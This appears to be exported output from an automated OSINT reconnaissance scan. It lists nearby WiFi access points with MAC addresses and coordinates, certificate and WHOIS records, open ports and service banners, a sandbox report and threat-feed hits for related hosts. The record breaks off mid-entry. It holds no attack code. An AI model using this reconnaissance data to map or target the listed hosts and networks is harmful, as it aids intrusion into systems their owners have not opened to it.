| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ^U^E^H^O^[^U^H^_^^^G^K^Z^X^E^^ (Net ID: 00:02:2D:7F:0D:E1) | 34.0544, -118.244 |
| 2023-05-12 02:44:28 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | [{u'pubkey_sha256': u'b8939526809ab88640a6a7884ee8dcb607fb00f7e0fcea60466af2f352ad1591', u'cert_sha256': u'4c1b41a7240eddfb2785d811a40b2c4f57217bbf48c89ee37ab9bce9cbb2e8a1', u'revoked': False, u'not_after': u'2023-05-12T05:22:09Z', u'not_before': u'2023-02-11T05:22:10Z', u'cert': {u'data': u'MIIEbzCCA1egAwIBAgIQDOP0HOjLu88T92xvNl7C6zANBgkqhkiG9w0BAQsFADBGMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzETMBEGA1UEAxMKR1RTIENBIDFQNTAeFw0yMzAyMTEwNTIyMTBaFw0yMzA1MTIwNTIyMDlaMBUxEzARBgNVBAMMCiouYXlodS54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDOGCjuHkugVPWyqEZy+nobtYPZt7mFtn64J+1Cu/WN2QyWoaw56LqsavmfDUZ9HWXUVkqJx6zzQg59eXqwARoe31pklpJBe3azcWUF1NOsy93t9hAuPZS8/rhdm68fc2ZBVSSRj2qTCcSpTsw/24NTkr7leWPXwPKt+xVM2s8mD64JEzJeL2F530O3Lj56P/FxUWrQLFEUK+VaOipjp4Bp1t3/Ick6bFmxlNeg1uDFWWINRTP8zAjzuQip6iSYXyI8W1F67yrbjMq2vTkc7Ol2GVTf9zgRMiB/Akq7l6c0/aiLNuo2r2JTnXhKt5g6qQePdJ5DMQirvmLAXgHszlPdAgMBAAGjggGIMIIBhDAOBgNVHQ8BAf8EBAMCBaAwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/BAIwADAdBgNVHQ4EFgQU96deJC4cenoqkDbfZhhrpxc2fj4wHwYDVR0jBBgwFoAU1fyeDd8eyt0Il5duK8VfxSv17LgweAYIKwYBBQUHAQEEbDBqMDUGCCsGAQUFBzABhilodHRwOi8vb2NzcC5wa2kuZ29vZy9zL2d0czFwNS9fTmFMS1NHU0lFWTAxBggrBgEFBQcwAoYlaHR0cDovL3BraS5nb29nL3JlcG8vY2VydHMvZ3RzMXA1LmRlcjAfBgNVHREEGDAWggoqLmF5aHUueHl6gghheWh1Lnh5ejAhBgNVHSAEGjAYMAgGBmeBDAECATAMBgorBgEEAdZ5AgUDMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmxzLnBraS5nb29nL2d0czFwNS9mWGJyRDA5NGl5US5jcmwwEwYKKwYBBAHWeQIEAwEB/wQCBQAwDQYJKoZIhvcNAQELBQADggEBAAm86rbPU9UY+jUB9RqEtNsbNagh1LAcjGHZCu2KmA7sWdF+ildPgYUhnYEXpW1QtwIXMD9ROQ8NqNmcO2+fFmv29nEwHvbN33YowTi0KujSztgietwrMtbLR4i1CYT6Emxu4DUWuySMl7qRfkVQnpXce/+W4fk3ETBciS7tpUJ/JrdchA9f4Nr5MvrivapSUXDN8HngLY5nVjy6wh7ZL6ZLE4zPcIWLBYbq7XqKdcSHxPy4EXKMN7HwCCE1+moKpyhYBi5LdBFwHiBf0mAs9kLK+ixuUCcq6r2PLcJm5OMMaUoLRxiiKSvKNU5S6XjdCKjia1FdeNTyixlmVdGqIfU=', u'sha256': u'4c1b41a7240eddfb2785d811a40b2c4f57217bbf48c89ee37ab9bce9cbb2e8a1', u'type': u'precert'}, u'dns_names': [u'*.ayhu.xyz', u'ayhu.xyz'], u'tbs_sha256': u'98d7b9ddd34587a9f0ca631c67a7ef0e434801d5af54bf0a58a4414132b54b78', u'id': u'4808403185', u'issuer': {u'pubkey_sha256': u'f3559fd766dc2e51474007c996ec67cd9e85ae0fa827d3d663f5abc2eafcbe24', u'friendly_name': u'Google Trust Services', u'name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5'}}, {u'pubkey_sha256': u'dc08bc7c8382f13f52efa247fc61a39cf343f06bf7ea548d231815f230797186', u'cert_sha256': u'c7525168b3dd0eaab22aaa03f908df3de610c6fa812b471a74d4a9b4cc1f27a5', u'revoked': False, u'not_after': u'2023-07-10T04:54:49Z', u'not_before': u'2023-04-11T04:54:50Z', u'cert': {u'data': u'MIIEbzCCA1egAwIBAgIQDUCN2XyhvUwNBsU/w+kuvDANBgkqhkiG9w0BAQsFADBGMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzETMBEGA1UEAxMKR1RTIENBIDFQNTAeFw0yMzA0MTEwNDU0NTBaFw0yMzA3MTAwNDU0NDlaMBUxEzARBgNVBAMMCiouYXlodS54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQClZfrYebeqn81huW1hu+MHJxbT4UZY2+o1+CbYyAl+tjl5EkV/SpbCZUe8N7N2RoMIJHsyY/UHthdmIBjkGIxuFn+8gewQOMwgbSzWKWU9JBV6eCrQQzxGAxCzJ0fGLNk3GvgRqoKtAHaniAwr8RqympV2xKlLw2L5Eoc1mlBgcYkGC/WDP7M3iz3L+cKZ7pnTyAgH4cYg/B7LlXT1wXQzixs5LmOJmGK9msYTsrWV7Mvuzifn2iTxjrbmq+J6IGPhJqvoBQMwbq5Z1AImEDbuPSr0wHhZ+nfNKoi9FpQa4cTK2Fu3Ei7bEA7slHdASbNvdRgi08tYPETQBeLbqADJAgMBAAGjggGIMIIBhDAOBgNVHQ8BAf8EBAMCBaAwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/BAIwADAdBgNVHQ4EFgQUulEpDi4duOMaunwRjTxpuyewUacwHwYDVR0jBBgwFoAU1fyeDd8eyt0Il5duK8VfxSv17LgweAYIKwYBBQUHAQEEbDBqMDUGCCsGAQUFBzABhilodHRwOi8vb2NzcC5wa2kuZ29vZy9zL2d0czFwNS9UUVhRYlQ1bk1TNDAxBggrBgEFBQcwAoYlaHR0cDovL3BraS5nb29nL3JlcG8vY2VydHMvZ3RzMXA1LmRlcjAfBgNVHREEGDAWggoqLmF5aHUueHl6gghheWh1Lnh5ejAhBgNVHSAEGjAYMAgGBmeBDAECATAMBgorBgEEAdZ5AgUDMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmxzLnBraS5nb29nL2d0czFwNS9QWDdmUjU5eVYtcy5jcmwwEwYKKwYBBAHWeQIEAwEB/wQCBQAwDQYJKoZIhvcNAQELBQADggEBADWK0mf97bEjcvCiTJfuxX7hsITeF+N/sP1M5PXZwYdKuDLWlxMtq8PYDM5gAno91YtPm4k3HgfoZU8T27zyP7rqOreX2KDASmWMNTX9aXcIbDy/4qZKAsr87eVSibzBtmGYeTyjMYzWHUlMbk9RS4Avowrr/aAdIwGetxORLuo5pmqlbmWgYEfP+kQB5K/ydMbAnChF1+tYOcc5JEHy8+OjqotZXAWhkQ6i8LCryznoWZcbn43YwkerwtlGA3pd6/0+ZQ35/twbopWANPBk9tZaQ+QrX1OLhGVTly+Pu/Qd+BCCGNrSMzGU6lmw3kkxpyhlDF7n+89Y8N5wm1xnU9E=', u'sha256': u'c7525168b3dd0eaab22aaa03f908df3de610c6fa812b471a74d4a9b4cc1f27a5', u'type': u'precert'}, u'dns_names': [u'*.ayhu.xyz', u'ayhu.xyz'], u'tbs_sha256': u'e25b9a56735c29036e5e585244fde0a2ba81adaf796b2d716bde988fd3954995', u'id': u'5073393240', u'issuer': {u'pubkey_sha256': u'f3559fd766dc2e51474007c996ec67cd9e85ae0fa827d3d663f5abc2eafcbe24', u'friendly_name': u'Google Trust Services', u'name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5'}}] |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://hypixel-api.senither.com | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:8880 | 104.21.6.166 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-4262 (Net ID: 00:1D:D1:0B:42:60) | 32.8608, -79.9746 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE115 (Net ID: 00:00:94:D4:4C:5A) | 41.8781, -87.6298 |
| 2023-05-12 03:10:08 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [185.199.110.0/24]
http://www.voipbl.org/update | 185.199.110.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | LocationFree.00014AEC392A (Net ID: 00:01:4A:EC:39:2A) | 37.7642, -122.3993 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.163): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Physical Location | No | Censys | 1 | 0 | 4 | 0 | None | Seattle, Washington, 98108, United States, North America | 2600:1f18:2489:8200::c8 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:443 | 172.67.168.252 |
| 2023-05-12 03:31:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | domain.operations@web.com | Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:41:04Z
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32256
Registrant Country: US
Registrant Phone: +1.5707088622
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32256
Admin Country: US
Admin Phone: +1.5707088622
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32256
Tech Country: US
Tech Phone: +1.5707088622
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: domain.operations@web.com
Registrar Abuse Contact Phone: +1.8777228662
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
This listing is a Network Solutions Private Registration. Mail
correspondence to this address must be sent via USPS Express Mail(TM) or
USPS Certified Mail(R); all other mail will not be processed. Be sure to
include the registrant's domain name in the address.
The data in Networksolutions.com's WHOIS database is provided to you by
Networksolutions.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record. Networksolutions.com makes this information available "as is," and
does not guarantee its accuracy. By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to: (1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Networksolutions.com (or its systems). The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Networksolutions.com.
Networksolutions.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
|
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5e66b449bc299e-ORD
| 188.114.96.1 |
| 2023-05-12 02:57:50 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://krauselab.net/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarE02F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarDE87.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: krauselab.net\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: krauselab.net\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_536"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_218_IE_EarlyTabStart_0xda4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_218_ConnHashTable<536>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_218_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_218_IESQMMUTEX_0_331"\n "Local\\InternetShortcutMutex"\n "IsoScope_218_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_536"\n "IsoScope_218_IESQMMUTEX_0_519"\n "IsoScope_218_IE_EarlyTabStart_0xda4_Mutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabDE76.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabE02E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "OYD0XE6J.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OYD0XE6J.txt]- [targetUID: 00000000-00000536]\n Dropped file: "9Y9YVR9G.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9Y9YVR9G.txt]- [targetUID: 00000000-00002316]\n Dropped file: "5APKTSW0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5APKTSW0.txt]- [targetUID: 00000000-00000536]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002316]\n "~DF5377A92EBB296218.TMP" has type "data"- Location: [%TEMP%\\~DF5377A92EBB296218.TMP]- [targetUID: 00000000-00000536]\n "TarE02F.tmp" has type "data"- Location: [%TEMP%\\TarE02F.tmp]- [targetUID: 00000000-00002316]\n "CabDE76.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabDE76.tmp]- [targetUID: 00000000-00002316]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "OYD0XE6J.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OYD0XE6J.txt]- [targetUID: 00000000-00000536]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "TarDE87.tmp" has type "data"- Location: [%TEMP%\\TarDE87.tmp]- [targetUID: 00000000-00002316]\n "_DD8BDE50-5BDB-11ED-8250-0800270E6663_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "CabE02E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabE02E.tmp]- [targetUID: 00000000-00002316]\n "_7E1294F2-5BD9-11ED-8250-0800270E6663_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF7333698817938F4A.TMP" has type "data"- Location: [%TEMP%\\~DF7333698817938F4A.TMP]- [targetUID: 00000000-00000536]\n "9Y9YVR9G.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9Y9YVR9G.txt]- [targetUID: 00000000-00002316]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00000536]\n "~DF74DD668BCA207352.TMP" has type "data"- Location: [%TEMP%\\~DF74DD668BCA207352.TMP]- [targetUID: 00000000-00000536]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002316]\n "~DF98532742D1ACFD1C.TMP" has type "data"- Location: [%TEMP%\\~DF98532742D1ACFD1C.TMP]- [targetUID: 00000000-00000536]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://krauselab.net/site.webmanifest"\n Pattern match: "https://krauselab.net"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: krauselab.net\nDNT: 1\nConnection: Keep-Alive"'}], u'threat_level': 0, u'size': None, u'job_id': u'63645cc4c15a80501d788fe5', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'suspicious_identifiers': [], u'attck_id': u'T1071.001', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Web Protocols', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_ide | 34.148.97.127 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00arthur00.github.io]
https://www.openphish.com/feed.txt | 00arthur00.github.io |
| 2023-05-12 02:55:15 | Raw Data from RIRs | No | Censys | 14 | 0 | 3 | 0 | None | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": 